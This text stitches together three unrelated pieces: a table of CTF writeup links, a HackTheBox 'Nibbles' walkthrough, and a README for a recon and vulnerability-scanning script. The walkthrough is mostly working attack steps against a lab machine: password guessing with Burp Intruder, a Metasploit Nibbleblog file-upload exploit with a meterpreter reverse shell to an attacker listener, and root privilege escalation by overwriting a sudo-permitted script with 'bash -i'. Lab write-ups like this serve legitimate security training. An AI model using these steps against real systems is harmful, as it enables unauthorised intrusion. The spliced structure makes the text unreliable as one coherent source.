| [HTB-Challenges-Hackerman](https://www.hackthebox.eu/home/challenges/Stego) | [Writeup-HTB-Hackerman-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/HTB/Challenges/Stego/Hackerman) | [VT URL Scan](https://www.virustotal.com/gui/url/8617823f21d95de6ab302b2898f01c2f4701a972e86f899ab53de72383dbec6c/detection) | [Interferencias HTB Challenge Writeup Hackerman](https://old.interferencias.tech/2019/10/01/htb-hackerman/) |
| [shs2k19CTF-Forensics-Foc01](http://ctf.securityhighschool.es/challenges?category=forense) | [Writeup-Foc01-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/shs2k19CTF/forense/foc01) | [VT URL Scan](https://www.virustotal.com/gui/url/02e11e06ed2ceb3153b32e1aa5bac034fd7d3bd4d695c0a88d0d71ba1c1be02d/detection) | |
| [shs2k19CTF-Crypto-Cryp01](http://ctf.securityhighschool.es/challenges?category=crypto) | [Writeup-Crypto01-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/shs2k19CTF/crypto/cryp01) | [VT URL Scan](https://www.virustotal.com/gui/url/a9ff318477de194f4bb57105955cd1206b4e614971d374b55fe29bd3eac70ff5/detection) | |
| [JASYPCTF19-Crypto-Rollo de papel](https://ctf.interferencias.tech/challenges#Rollo%20de%20papel) | [Writeup-Rollo de papel-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/JASYPCTF19/crypto/rollo_de_papel) | [VT URL Scan](https://www.virustotal.com/gui/url/e2752563e3f6d25eef5db4bda0b32cba710bf06d9085cb0b9dd9f569439a443d/detection) | |
| [JASYPCTF19-Stego-Gatito Precioso](https://ctf.interferencias.tech/challenges#Gatito%20precioso) | [Writeup-Gatito Precioso-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/JASYPCTF19/stego/gatito_precioso) | [VT URL Scan](https://www.virustotal.com/gui/url/d590caf2eb49aee6698a262f47b777016cc61127a7007387fa35a2fdafefe354/detection) | |
| [JASYPCTF19-Stego-Perro Maligno](https://ctf.interferencias.tech/challenges#Perro%20maligno) | [Writeup-Perro_Maligno-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/JASYPCTF19/stego/perro_maligno) | [VT URL Scan](https://www.virustotal.com/gui/url/89ad8d5ea881fda6462a4e16556b03c080631a35d61ef9f39dae33c74fec1a13/detection) | |
| [JASYPCTF19-Stego-Nos LLaman](https://ctf.interferencias.tech/challenges#Nos%20llaman) | [Writeup-Nos_llaman-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/JASYPCTF19/stego/nosllaman) | [VT URL Scan](https://www.virustotal.com/gui/url/50d9d90db59bd00c54d7bae856df2c371e5c255fc7140c2404b53f7e9a2d4ec9/detection) | |
| [HTB-Machines-Netmon](https://www.hackthebox.eu/home/machines/profile/177) | [Walkthrough-HTB-Netmon-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/HTB/Machines/HTB-Machine-Netmon-Walkthrough-1v4n-Released.pdf) | [66d85aa5a8a36f0bc9a6a60c2c2f60ff](https://www.virustotal.com/gui/file/dbd00668d3bfebe80c6b57a36c711c751790f3b9c9eb5c538dca0c668aafc4a1/details) | [Interferencias-HTB Machine Walkthrough: Netmon](https://old.interferencias.tech/2019/06/30/htb-netmon/) |
| [JASYPCTF19-Forensics-Cuantas contraseñas](https://ctf.interferencias.tech/challenges#Cuantas%20contrase%C3%B1as) | [Writeup-Forensics-Cuantas contraseñas](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/JASYPCTF19/forensic/cuantas_contrase%C3%B1as/) | [VT URL Scan](https://www.virustotal.com/gui/url/0bcb0ab3f70394db62cc927a673ad2c6233488bb6ebdea32e1e6896a24bdbdd1/detection) | [Honey Sec WRITEUP - JASYP19 - Challenges - Cuantas contraseñas](https://honeysec.blogspot.com/2019/06/writeup-jasyp19-challenges-cuantas.html) |
| [JASYPCTF19-Forensics-Nice port](https://ctf.interferencias.tech/challenges#Nice%20port) | [Writeup-stephanography-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/JASYPCTF19/forensic/nice_port) | [VT URL Scan](https://www.virustotal.com/gui/url/9cb73359a0a23ddcc2317eb5b3d4cf61ffb4c98d96bdd146fbd9d1013d31a594/detection) | |
| [CSACTF19-misc-stephanography](https://ctftime.org/task/8674) | [Writeup-stephanography-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/CSACTF19/misc/stephanography) | [VT URL Scan](https://www.virustotal.com/gui/url/a0fd77f8df5d832afd7460c9522c1b739c2565705f4d5645ebf86a10c6d03681/detection) | [Honey Sec WRITEUP Challenge stephanography](https://honeysec.blogspot.com/2019/05/writeup-csactf19-challenges.html) |
| [CSACTF19-misc-A_game_of_apples](https://ctftime.org/task/8594) | [Writeup-A_game_of_apples-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/CSACTF19/misc/a_game_of_apples) | [VT URL Scan](https://www.virustotal.com/gui/url/7a5b04bedf1d0c2ab4f923d3c0b7f11e025dea2beef370a185d1329a05a45263/detection) | [CTFTime-A_game_of_apples-1v4n](https://ctftime.org/writeup/15391) |
| [CSACTF19-forensics-Zippy](https://ctftime.org/task/8453) | [Writeup-Zippy-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/CSACTF19/forensics/Zippy) | [VT URL Scan](https://www.virustotal.com/gui/url/e32183587f49bccdbcd6f77d2e67123f2f86f59c86e9f56e953199b86c0c7007/detection) | [CTFTime-Zippy-1v4n](https://ctftime.org/writeup/15392) |
| [CSACTF19-misc-linux1](https://ctftime.org/task/8453) | [Writeup-linux1-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/CSACTF19/misc/linux1) | [VT URL Scan](https://www.virustotal.com/gui/url/7a5b04bedf1d0c2ab4f923d3c0b7f11e025dea2beef370a185d1329a05a45263/detection) | [Honey Sec WRITEUP Challenge Linux](https://honeysec.blogspot.com/2019/05/writeup-challenge-linux-201-by-1r0dm448o.html) |
| [BBCTF19-Crypto-oldschool](https://ctftime.org/task/8187) | [Writeup-oldschool-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/BBCTF19/crypto/oldschool) | [VT URL Scan](https://www.virustotal.com/gui/url/712465627b3f8f49cbb243a02f60746f5299a573f1af751f4f528b5f06154a98/detection) | [CTFTime-oldschool-1v4n](https://ctftime.org/writeup/15246) |
| [BBCTF19-Crypto-RivestShamirAdleman](https://ctftime.org/task/8187) | [Writeup-RivestShamirAdleman-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/BBCTF19/crypto/RivestShamirAdleman) | [VT URL Scan](https://www.virustotal.com/gui/url/7b6329b72e02d5af9db9e0a4554bf1bcf5005f956d217980600f4e8b265e4e6a/detection) | [CTFTime-RivestShamirAdleman-1v4n](https://ctftime.org/writeup/15241) |
| [b00t2root19-Crypto-Genetics](https://ctftime.org/task/7932) | [Writeup-Genetics-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/b00t2root19/Crypto/Genetics) | [VT URL Scan](https://www.virustotal.com/gui/url/75bfa665a30e4ba742b4d19bfaf794460e966c945de820ad17f4b774dec20f7d/detection) | [Honey Sec WRITEUP Genetics (Crypto) b00t2root CTF](https://honeysec.blogspot.com/2019/04/genetics-httpipchallengesgenetics.html) |
| [b00t2root19-Linux-Steve Rogers](https://ctftime.org/task/7932) | [Writeup-Steve Rogers-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/b00t2root19/Linux/steve_rogers) | [VT URL Scan](https://www.virustotal.com/gui/url/7fbbb74be159055cabc07e25f38962919a69504b714a94c3afb6474a10a58b45/detection) | [CTFTime-b00t2root19-Steve Rogers-1v4n](https://ctftime.org/writeup/14621) |
| [b00t2root19-Forensics-loopback](https://ctftime.org/task/7939) | [Writeup-loopback-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/b00t2root19/Forensics/loopback) | [VT URL Scan](https://www.virustotal.com/gui/url/d475aa2b714ce04094568ac763597f17e3934a94b6827cf22dab562ebd6a5b34/detection) | [CTFTime-b00t2root19-loopback-1v4n](https://ctftime.org/writeup/14597) |
| [b00t2root19-Forensics-key_me_baby](https://ctftime.org/task/8149) | [Writeup-key_me_baby-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/b00t2root19/Forensics/key_me_baby) | [VT URL Scan](https://www.virustotal.com/gui/url/e42e81f44f117c41d925ca62b4794d1c8c6a2db2a526e7bdaeb621ecd6c92f16) | [CTFTime-b00t2root19-key_me_baby-1v4n](https://ctftime.org/writeup/14251) |
| [b00t2root19-Crypto-cuz_rsa_is_lub](https://ctftime.org/event/780/tasks/) | [Writeup-rsa_is_lub-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/b00t2root19/Crypto/cuz_rsa_is_lub) | [VT URL Scan](https://www.virustotal.com/gui/url/9c48d31113e0843117ed116b6072e7b689d6b2bbb3153f79e0e113743a4d4423) | [CTFTime-b00t2root19-rsa_is_lub-1v4n](https://ctftime.org/writeup/14251) |
| [HTB-Machines-Curling](https://www.hackthebox.eu/home/machines/profile/160) | [Walkthrough-HTB-Curling-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/HTB/Machines/HTB-Machine-Curling-Walkthrough-1v4n-Released.pdf) | [72cc35cb342e11bca1d095c83214cd08](https://www.virustotal.com/#/file/2361d1e48b5451e060c608d351915f1a3402365e7e713588e4a4451f577126d7/) | [Honey Sec-HTB-Machine Walkthrough-Curling](https://honeysec.blogspot.com/2019/03/htb-machine-walkthrough-curling.html) |
| [Hackplayers-Reto 27-boot2root-Karim](https://www.hackplayers.com/2018/09/reto-27-boot2root-karim.html) | [Solución-Reto 27-Boot2root-Karim-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/Hackplayers/Machines/HackPlayers-Reto-27-boot2root-Walkthrough-Karim.pdf) | [455aa41c667502619f85936e992e0a9e](https://www.virustotal.com/#/file/2e7b3fb009f859a607fa37536d6d09da96b034b5c1227b636d883c02c9e04f25/) | [Solución-Reto 27-Boot2root-Karim-1v4n](https://www.hackplayers.com/2018/09/solucion-al-reto-27-boot2root-karim.html) |
| [HTB-Machines-Olympus](https://www.hackthebox.eu/home/machines/profile/135) | [Walkthrough-HTB-Olympus-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/HTB/Machines/HTB-Machine-Olympus-Walkthrough-1v4n-Released.pdf) | [ f3a9a988cdab32763816e1abf6975756](https://www.hybrid-analysis.com/sample/ffe715aacbbea2756aa3564c0d03e6dc4f57b9ee39631f91f1daa5c28f006797) | [Fwhibbit-HTB-Writeup–Olympus](https://www.fwhibbit.es/htb-write-up-olympus-por-1r0dm48o) |
| [HTB-Machines-Jerry](https://www.hackthebox.eu/home/users/profile/56686) | [Walkthrough-HTB-Jerry-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/HTB/Machines/HTB-Machine-Jerry-Walkthrough-Jerry-1v4n-Released.pdf) | [9496fc01055a9bcae00b894a43dc7abd](https://www.hybrid-analysis.com/sample/995b160658c5bfb76d1bf9f0beb450f0e2f024c7e3b77774e9074176a447d589) | [Hackplayers-HTB-repo-1v4n](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/1v4n-jerry.pdf) |
| [UAM-Silicon Valley-Ep2](https://unaalmes.hispasec.com/challenges#EPISODIO%201%20-%202%C2%AA%20PARTE) | [Writeup-UAM-Silicon Valley-Ep1-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/UAM/SiliconValley/Episodio2/UAM-Episodio2-Silicon_Valley-1v4n.pdf) | [0b405fb5d991e0823dd9347ee9caa4aa](https://www.virustotal.com/gui/file/169f31d64d5e6a3015f0ab23956ccc4fbb41a1fb853969c4b8b342fcf720c2b3) | [Writeup-UAM-repo-Silicon Valley-Ep2-1v4n](https://github.com/devploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/1v4n) |
| [UAM-Silicon Valley-Ep1](https://unaalmes.hispasec.com/challenges#EPISODIO%201) | [Writeup-UAM-Silicon Valley-Ep1-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/UAM/SiliconValley/Episodio1/Writeup-UAM-Silicon_Valley-Ep1-1v4n.pdf) | [39a227d42c46a5ecdefcad17be3bfc3a](https://www.virustotal.com/gui/file/bfa1677d871450330739b6a163ee7fddb40d874098cc49286d8d5ca053711eb1) | [Writeup-UAM-repo-Silicon Valley-Ep1-1v4n](https://github.com/devploit/unaalmes-writeups/blob/master/writeups/siliconvalley/episodio1/1v4n/1v4n-episodio1.pdf) |
| [UAM-Misión 006](https://unaaldia.hispasec.com/) | [Writeup-UAM-Mission06-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/UAM/UAM-Mision06/Writeup-UAM-Misi%C3%B3n%23006-1v4n.pdf) | [7e5458ad667bd4f2721a46c54e5966c3](https://www.virustotal.com/gui/file/09a85991d9c96622cbd9e85c71f79b4270b81748f9763a031524821edbc18203) | [Writeup-Mission06-UAM-repo-1v4n](https://github.com/devploit/unaalmes-writeups/blob/master/writeups/missions/mission06/1v4n/1v4n-mission06.txt) |
| [UAM-Misión 002](http://unaaldia.hispasec.com/2017/12/segunda-entrega-una-al-mes-mision-002.html) | [Writeup-UAM-Mission02-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/UAM/UAM-Mision02) | [VT URL Scan](https://www.virustotal.com/gui/url/ec4d5deb2928c50f9a82b0489358febd729be63b8b60607fb0aec3d78ee6a0df/detection) | [Writeup-Mission02-UAM-repo-1v4n](https://github.com/devploit/unaalmes-writeups/blob/master/writeups/missions/mission02/1v4n/1v4n-mission02.txt) |
|
# Nibbles
URL: https://app.hackthebox.com/machines/Nibbles
Level: Easy
Date 2 Jun 2020
## Walkthrough
- [Enumeration](#enumeration)
- [User flag](#user-flag)
- [Privesc](#privesc)
# Enumeration
## NMAP
```
# Nmap 7.80 scan initiated Tue Jun 2 21:30:42 2020 as: nmap -T4 -A -p- -oN Nibbles_nmap.txt 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
```
We search for `Apache 2.4.18` exploit:
```
root@kali:/opt/htb/Nibbles# searchsploit apache 2.4
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting | unix/remote/30835.sh
Apache 2.4.17 - Denial of Service | windows/dos/39037.php
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
Apache 2.4.23 mod_http2 - Denial of Service | linux/dos/40909.py
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution | php/remote/40142.php
Apache 2.4.7 mod_status - Scoreboard Handling Race Condition | linux/dos/34133.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit) | multiple/remote/48410.rb
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree | multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure | multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure | multiple/remote/21491.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
```
We look at HTML source and we discover an interesting comment:
```
<!-- /nibbleblog/ directory. Nothing interesting here! --> <!-- /nibbleblog/ directory. Nothing interesting here! -->
```
Then, we search again for `nibble`:
```
root@kali:/opt/htb/Nibbles# searchsploit nibble
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
```
msf5 > search nibble
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > info
Description:
Nibbleblog contains a flaw that allows an authenticated remote
attacker to execute arbitrary PHP code. This module was tested on
version 4.0.3.
```
So we need to authenticate.
We try some credentials:
http://10.10.10.75/nibbleblog/admin.php
And we capture POST request:
```
POST /nibbleblog/admin.php HTTP/1.1
Host: 10.10.10.75
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.75/nibbleblog/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
Cookie: PHPSESSID=3l0g5av9q1aah9fr0p32mspn25
Upgrade-Insecure-Requests: 1
username=admin&password=admin
```
We then use Burpsuite, and we create a simple wordlist:
`
admin
nibble
blog
nibbles
`
Thanks to "Intruder" feature, we discover that `admin:nibbles` is a valid combination.
Now, we can fully configure `msfconsole`:
```
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
TARGETURI => /nibbleblog/
msf5 exploit(multi/http/nibbleblog_file_upload) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.75 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.36 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf5 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 3 opened (10.10.14.36:4444 -> 10.10.10.75:44296) at 2020-06-28 18:28:24 +0200
[+] Deleted image.php
meterpreter >
meterpreter >
```
We were able to upload our malicious script and get a shell.
# User-flag
We are now "nibbler" user:
```
meterpreter >
meterpreter > sysinfo
Computer : Nibbles
OS : Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 2201 created.
Channel 0 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
whoami
nibbler
```
# Privesc
We check for some basic privesc technique:
```
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
We are allowed to run `monitor.sh` script with root privilege.
We need to replace it with a shell:
```
cd /home/nibbler
dir
mkdir -p personal/stuff
cd personal/stuff
echo "bash -i" > /home/nibbler/personal/stuff/monitor.sh
chmod +x /home/nibbler/personal/stuff/monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
id
sudo: unable to resolve host Nibbles: Connection timed out
bash: cannot set terminal process group (1332): Inappropriate ioctl for device
bash: no job control in this shell
root@Nibbles:/home/nibbler/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
```
|
# ReconScan
The purpose of this project is to develop scripts that can be useful in the pentesting workflow, be it for VulnHub VMs, CTFs, hands-on certificates, or real-world targets.
The project currently consists of two major components: a script invoking and aggregating the results of existing tools, and a second script for automated analysis of the aforementioned results from the perspective of exploitability.
In terms of real-world pentesting, these scripts are not meant to replace commercial tools such as Nessus or Nexpose, but they can complement it nicely for finding the latest vulnerabilities and their PoC exploits.
## Network reconnaissance
The `recon.py` script runs various open-source tools in order to enumerate the services on a host. Best run under Kali Linux or similar pentesting-oriented distribution with these tools preinstalled and preconfigured.
The flow followed by the script is as follows:
- Scan all TCP/UDP ports with nmap, service detection, minimal amount of scripts:
- If there are unidentified services, try amap.
- For identified software, run vulnerability analysis with `vulnscan.py`
- For identified services, run further analysis:
- HTTP(S): nikto, dirb
- FTP: hydra if requested
- SMB: enum4linux, samrdump, nbtscan
- SSH: hydra if requested
- SNMP: onesixtyone, snmpwalk
- DNS: attempt zone transfer (axfr) with dig
- Additionally, all nmap scripts are run for the following services:
- HTTP(S), SMTP, POP3, IMAP, FTP, SMB, MSSQL, MySQL, Oracle, SNMP, RDP, VNC
Results will be dumped into the `results/$ip_address` directory, with the `$port_$service_$tool` file naming scheme. The tools are mostly run simultaneously (unless one depends on the result of another) and the CLI output will be aggregated and tagged by the script, so you will see the progress and dirt found by each running script in real-time.
### Origin
This script is inspired by [Mike Czumak's Recon Scan](http://www.securitysift.com/offsec-pwb-oscp/), which he wrote during his OSCP exam. Many modifications can be found on GitHub, however, I wanted to write a script from scratch, familiarizing myself with each tool and their parameterization, instead of just reusing a bunch of scripts found scattered in various repositories, leaving me none the wiser.
### Usage
usage: recon.py [-h] [-b] [-n] [-p] [-v] [-o OUTPUT] [--nmap NMAP] [--hydra HYDRA]
address [port] [service]
Network reconnaissance tool for enumerating the everliving fuck out of a host.
positional arguments:
address address of the host.
port port of the service, if scanning only one port
service type of the service, when port is specified
optional arguments:
-h, --help show this help message and exit
-b, --bruteforce only bruteforce credentials with hydra
-n, --dry-run does not invoke commands
-p, --parallel runs multiple commands in parallel, if set
-v, --verbose enable verbose output, repeat for more verbosity
-o OUTPUT, --output OUTPUT
output directory for the results
--nmap NMAP additional nmap arguments
--hydra HYDRA additional hydra arguments
#### Example run
$ ./recon.py -v 192.168.1.84
[*] Scanning host 192.168.1.84...
[*] Running task nmap-tcp with nmap -v -sV -sC -T5 -p- -oN "results/192.168.1.84/0_tcp_nmap.txt" -oX "results/192.168.1.84/0_tcp_nmap.xml" 192.168.1.84
[*] Running task nmap-udp with nmap -v -sV --version-intensity 0 -sC -sU -T5 -oN "results/192.168.1.84/0_udp_nmap.txt" -oX "results/192.168.1.84/0_udp_nmap.xml" 192.168.1.84
[*] Service 22/tcp is ssh running OpenSSH version 4.7p1 Debian 8ubuntu1.2
[*] Service 80/tcp is http running Apache httpd version 2.2.8
[*] Service 137/udp is netbios-ns running Microsoft Windows netbios-ns
[*] Service 139/tcp is netbios-ssn running Samba smbd version 3.X - 4.X
[*] Service 445/tcp is netbios-ssn running Samba smbd version 3.0.28a
[*] Starting scan of services...
[*] Scanning service ssh on port 22/tcp...
[*] Scanning service http on port 80/tcp...
[*] Running task nmap-80 with nmap -vv -sV -T5 -Pn -p 80 --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-* -oN "results/192.168.1.84/80_http_nmap.txt" -oX "results/192.168.1.84/80_http_nmap.xml" 192.168.1.84
[*] Running task curl-1-80 with curl -i http://192.168.1.84:80/ -o "results/192.168.1.84/80_http_index.html"
[*] Running task curl-2-80 with curl -i http://192.168.1.84:80/robots.txt -o "results/192.168.1.84/80_http_robots.txt"
[*] Running task dirb-80 with dirb http://192.168.1.84:80 -o "results/192.168.1.84/80_http_dirb.txt" -r
[*] Running task nikto-80 with nikto -h http://192.168.1.84:80 -o "results/192.168.1.84/80_http_nikto.txt"
[*] Scanning service netbios-ns on port 137/udp...
[!] Service netbios-ns has no scanner support.
[*] Scanning service netbios-ssn on port 139/tcp...
[*] Running task nmap-139 with nmap -vv -sV -T5 -Pn -p 139 --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-*,smbv2-enabled.nse -oN "results/192.168.1.84/139_smb_nmap.txt" -oX "results/192.168.1.84/139_smb_nmap.xml" 192.168.1.84
[*] Running task enum4linux-139 with enum4linux -a 192.168.1.84 | tee "results/192.168.1.84/139_smb_enum4linux.txt"
[*] Running task samrdump-139 with python2 /usr/share/doc/python-impacket/examples/samrdump.py 192.168.1.84 139/SMB | tee "results/192.168.1.84/139_smb_samrdump.txt"
[*] Scanning service netbios-ssn on port 445/tcp...
[*] Running task nmap-445 with nmap -vv -sV -T5 -Pn -p 445 --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-*,smbv2-enabled.nse -oN "results/192.168.1.84/445_smb_nmap.txt" -oX "results/192.168.1.84/445_smb_nmap.xml" 192.168.1.84
[*] Running task enum4linux-445 with enum4linux -a 192.168.1.84 | tee "results/192.168.1.84/445_smb_enum4linux.txt"
[*] Running task samrdump-445 with python2 /usr/share/doc/python-impacket/examples/samrdump.py 192.168.1.84 445/SMB | tee "results/192.168.1.84/445_smb_samrdump.txt"
## Vulnerability analysis
The `vulnscan.py` script analyses a specified CPE name to determine whether it has any known vulnerabilities and published exploits.
As input, it takes a CPE name, a full name and version, or a path to an xml-based nmap report, which was generated with service detection. When not providing a CPE name, the free-text provided will be fuzzy-matched with the CPE dictionary to check if the provided software name and version has a CPE name. When an nmap report is provided, the CPE names for the identified services are used for the lookup. If the software name and version is available, but the CPE name is not, it will try to fuzzy-match it.
Based on my previous experiences, directly looking up the affected software entries in the CVE database does not always yield the most accurate results, as a software might have multiple CPE names, all referring to the same software. For example, `nginx` might be listed as `cpe:/a:nginx:nginx` or `cpe:/a:igor_sysoev:nginx`, and on the more extreme side, `X11` has 12 CPE aliases. In order to combat this, a CPE alias list is used, which is provided and maintained by the Debian Security team, and all aliases are looked up for a given CPE name. Using this technique tends to generate much better results.
Vulnerabilites are listed and color-coded based on availability:
* gray - no public known exploit,
* yellow - partially public or limited information,
* red - public exploit available.
